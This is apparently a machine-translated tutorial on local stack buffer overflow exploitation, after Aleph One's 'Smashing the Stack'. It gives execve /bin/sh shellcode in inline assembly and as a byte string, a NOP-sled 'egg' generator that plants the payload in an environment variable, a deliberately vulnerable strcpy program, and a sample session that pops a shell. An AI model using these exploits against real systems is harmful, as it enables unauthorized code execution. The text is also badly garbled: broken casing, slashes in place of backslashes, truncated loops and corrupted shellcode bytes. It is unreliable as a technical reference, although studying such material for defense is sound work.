shellcode
Use the system to call EXECVE to get the shell
1, Execve function usage
Function original is int Execve (Const Char * filename, char * const argv [], char * const envp []); routine $ VI TC INT Main (int Argc, char ** argv) {char * name [2] = {"/ bin / sh", 0}; execve (name [0], name, 0); return 0;} $ cc tc $ ./a.out SH-2.05A $ EXITEXIT $
2, assembly code
Compilation statement running system calls need to make EAX = 0xbebx = / bin / sh strings ECX = argv ie store / bin / sh address memory location EDX = ENVP environment variable pointer count
$ vi asm.cint main () {__ASM ("JMP 1F 2: POP% EBX; EBX Storage / Bin / SH address MOVL% EBX, 0x8 (% EBX); EBX 8 stores / bin / sh's address xor % EDX,% EDX; EDX = 0 MOVB% DL, 0x7 (% EBX); string end MOVL% EDX, 0xc (% EBX); empty pointer MOVB $ 0XB,% Al; Execve system call number is 11 LEA 0x8 ( % EBX),% ECX; ECX is the location INT $ 0x80 1: Call 2B "in memory / bin / sh address"; get / bin / sh address);
Delivery cases in / bIN / SH
EBX 0 [/ bin / sh] filenameebx 7 [0] EBX 8 [EBX] argvebx c [0]
Similar to char * argv [2] = {"/ bin / sh", null}; argv = EBX 8
Get shellcodechar shellcode [] = "/ x5b / x08 / x31 / xd2" "/ x88 / x53 / x07 / x89 / x53 / x0c / xb0 / x0b" "/ x8d / x4b / x08 / XCD / X80 / XE8 / XE8 / XFF "/ XFF / XFF / BIN / SH";
Total 33 bytes
3, the main function starts when the ESP value is executed
After the system is initialized, the main function PUSH% EBP; MOVL% ESP, and the ESP = EBP is approximately 0xBffFFA98 to get the value of the main function to start executing the value of ESP $ VI TMP.cvoid main ()}
(Gdb) disassemble mainDump of assembler code for function main: 0x80483d0
4, overflow test
Array (NOP ...) (Begin of The Buffer)
1> Spill buffer generating program
#include
#define default_offset 0 # define default_buffer_size 512 # Define NOP 0x90
Char shellcode [] = "/ x5b / x08 / x31 / xd2" "/ x88 / x53 / x07 / x89 / x53 / x0c / xb0 / x0b" / x8d / x4b / x08 / xcd / x80 / xe8 / xe8 / xff "" / XFF / XFF / BIN / SH ";
Unsigned int GET_SP () {__ASM __ ("MOVL% ESP,% EAX");
INT Main (int Argc, char ** argv) {char * buff, * ptr; int * addr_ptr, addr; int offset = default_offset, bsize = default_buffer_size; int i;
IF (Argc> 1) BSIZE = ATOI (Argv [1]); if (Argc> 2) OFFSET = ATOI (Argv [2]);
IF (! (buff = malloc (bsize)))) {Printf ("can't allocate memorry./n"); exit (0);
AddR = get_sp () - offset; Printf ("ESP: 0x% x / n", Addr Offset; Printf ("Using Address: 0x% x / n", ADDR);
PTR = BUFF; addr_ptr = (int *) PTR; for (i = 0; i For (i = 0; i PTR = BUFF (BSIZE / 2 - Strlen (shellcode) / 2); for (i = 0; I BUF [BSIZE - 1] = '/ 0'; Memcpy (BUFF, "EGG =", 4); Putenv (BUFF); System ("/ bin / bash"); / * Enables environment variables to valid in new shell * / return 0;} 2> Procedures with overflow vulnerabilities INT Main (int Argc, char ** argv) {charffer [512]; Printf ("0x% x / n", (int) buffer; if (argc> 1) STRCPY (Buffer, Argv [1]); Return 0;} 3> Parameters used in overflow $ ./generate 612 1536esp: 0xBfffa58using address: 0xBfff458 $ ./vulnerable $ Eggsh-2.05A $ EXITEXIT $ The second parameter of Generate can increase, the return address of the address overlay function closer to shellcode The address of the buffer is 0xBffFFF3F0, and the padded data begins with a lot of NOP instructions, and the back shellcode can still be performed from 0xBffFF458. Note that environment variables and command line parameters are placed in the stack space, which will make the value of the ESP decrease when the main function begins. When the nesting shell is executed / bin / sh, the value of the ESP will be reduced. Reference Smashing The Stack for Fun and Profit by Aleph One
